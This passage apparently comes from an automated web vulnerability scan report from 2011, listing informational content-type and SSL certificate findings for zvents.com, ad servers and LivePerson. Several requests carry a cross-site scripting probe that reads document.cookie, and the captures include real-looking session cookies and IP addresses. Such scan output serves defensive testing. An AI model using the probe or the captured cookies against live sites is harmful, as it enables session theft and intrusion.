Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:36 GMT
Content-Type: image/gif
Content-Length: 635
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 13:33:36 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

.PNG
.
...IHDR..............W.?...2PLTE..............l..C........n.............................
........)..-..............D..............
..$.....;...........U.....7..B....................F..t..~...
...[SNIP]...

28.42. http://www.zvents.com/images/zlogo.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zvents.com
Path:   /images/zlogo.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/zlogo.gif HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:36 GMT
Content-Type: image/gif
Content-Length: 1797
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 13:33:36 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

.PNG
...[SNIP]...

28.43. http://www.zvents.com/json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zvents.com
Path:   /json

Issue detail

The response contains the following Content-type statement: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /json?jsonsp=Zvents_load_ZventsWidget1&limit=3 HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.berkshireeagle.com/?f0ba9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e6d2fe4b4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298899998236%26vn%3D1; s_invisit=true; c_m=Noneburpburp; cf=1; s_sq=%5B%5BB%5D%5D; __gads=ID=29529442f7375d88:T=1296308016:S=ALNI_MYQjVN2o43T_cMDeG0v0xQX8dOB-Q; __utmb=48628589; __utmc=48628589; __utma=48628589.1054599713.1296307999.1296307999.1296307999.1; __utmz=48628589.1296308005.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/67|utmcmd=referral; __qca=P0-2063348051-1296308005449; welcome=12963079979400.4568707060534507; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:40:19 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 14
ETag: "4dbd31c7d62a4fade659d8056064bbde"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiC3JhZGl1c2lQIgljaXR5IgtEYWxsYXMiCmVycm9yRiINbGF0aXR1ZGVmFzMyLjc4MjUwMTIyMDcwMzEyNSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBAiCnN0YXRlIgdUWA%3D%3D--7570ddda372f0c1dfdd2d0236d256406d694cf75; path=/; expires=Fri, 29-Apr-2011 13:40:19 GMT; HttpOnly
Content-Length: 93

Zvents_load_ZventsWidget1('callback({"rsp":{"status":"ok","content":{"next_page":false}}})')

28.44. http://www.zvents.com/partner_json/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zvents.com
Path:   /partner_json/search

Issue detail

The response contains the following Content-type statement: text/plain; charset=utf-8. The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /partner_json/search?spn_limit=3&advq=true&swhere=Dallas%2C+TX&srss=0&has_dont_miss_this=1&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.images%2Cevent.starttime&radius=80&ad_limit=1&st=event&jsonsp=jsp_0 HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298899998236%26vn%3D1; s_invisit=true; c_m=Noneburpburp; cf=1; s_sq=%5B%5BB%5D%5D; __gads=ID=29529442f7375d88:T=1296308016:S=ALNI_MYQjVN2o43T_cMDeG0v0xQX8dOB-Q; __utmb=48628589; __utmc=48628589; __utma=48628589.1054599713.1296307999.1296307999.1296307999.1; __utmz=48628589.1296308005.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/67|utmcmd=referral; __qca=P0-2063348051-1296308005449

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:44 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
X-Rack-Cache: stale, valid, store
X-HTTP_CLIENT_IP_O: 70.244.73.246
Access-Control-Allow-Origin: *
X-Runtime: 169
ETag: "d76222484320078712e1b599465d841b"
X-Content-Digest: fd73232c215f041c773c6b78933a7e7812eabca5
Cache-Control: max-age=1800, public
Age: 0
Content-Length: 6269

jsp_0('callback({"rsp":{"status":"ok","content":{"sponsored_events":[{"name":"Dane Cook","id":149220025,"images":[{"url":"http://www.zvents.com/images/internal/5/2/3/6/img_8946325_thumb.jpg?resample_m
...[SNIP]...

29. Content type is not specified
There are 5 instances of this issue:

Issue description

If a web response does not specify a content type, the browser will usually inspect the response body and attempt to guess its MIME type (content sniffing). This can have unexpected results: if the body contains any user-controllable data, the browser may interpret it as HTML or script, which may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

29.1. http://ad.turn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"318-1282604189000"
Last-Modified: Mon, 23 Aug 2010 22:56:29 GMT
Content-Length: 318
Date: Fri, 28 Jan 2011 16:39:19 GMT

...[SNIP]...

29.2. http://ads.bluelithium.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Fri, 28 Jan 2011 21:57:38 GMT
Pragma: no-cache
Content-Length: 4542
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

29.3. http://base.liveperson.net/hc/5296924/cmd/url/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://base.liveperson.net
Path:   /hc/5296924/cmd/url/

Request

GET /hc/5296924/cmd/url/?site=5296924&SV!click-query-name=chat-seo-campaign1&SV!click-query-room=chat-seo-campaign1&SV!click-query-state=Available&SV!click-query-channel=web&page=http%3A//base.liveperson.net/hc/5296924/%3Fcmd%3Dfile%26file%3DvisitorWantsToChat%26site%3D5296924%26SV%21chat-button-name%3Dchat-seo-campaign1%26SV%21chat-button-room%3Dchat-seo-campaign1%26referrer%3D%28button%2520dynamic-button%3Achat-seo-campaign1%28Live%2520Chat%2520by%2520LivePerson%29%29%2520http%253A//solutions.liveperson.com/live-chat/C1/%253Futm_source%253Dbing%2526utm_medium%253Dcpc%2526utm_keyword%253Dlive%252520chat%2526utm_campaign%253Dchat%252520-us&id=4553523208&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1296223648368 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:16:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 675

<html><body><script language="javascript">function lpRedirectBack() {document.location='/hc/5296924/cmd/url/?site=5296924&page='+escape("http://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWan
...[SNIP]...

29.4. https://base.liveperson.net/hc/5296924/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/

Request

GET /hc/5296924/?cmd=file&file=chatTemplate&site=5296924&sessionkey=H6680227135865200365-3761611791040242971K15949386&template=modern_mainstyle.css HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:16:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 13

<HTML></HTML>

29.5. http://www.mixpo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mixpo.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.mixpo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=203637455.1296308034.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/68; __utma=203637455.2076230744.1296308034.1296308034.1296308034.1; __utmc=203637455; __utmb=203637455.1.10.1296308034

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"1150-1275083924000"
Last-Modified: Fri, 28 May 2010 21:58:44 GMT
Content-Length: 1150
Date: Sat, 29 Jan 2011 13:34:12 GMT

...[SNIP]...

30. SSL certificate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tt3.zedo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.zedo.com,ST=California
Issued by:  Akamai Subordinate CA 3
Valid from:  Thu Aug 12 00:04:02 CDT 2010
Valid to:  Fri Aug 12 00:04:02 CDT 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general and against HTTPS web connections in particular. A determined and suitably positioned attacker may be able to compromise SSL connections without the user noticing, even when a valid SSL certificate is used.
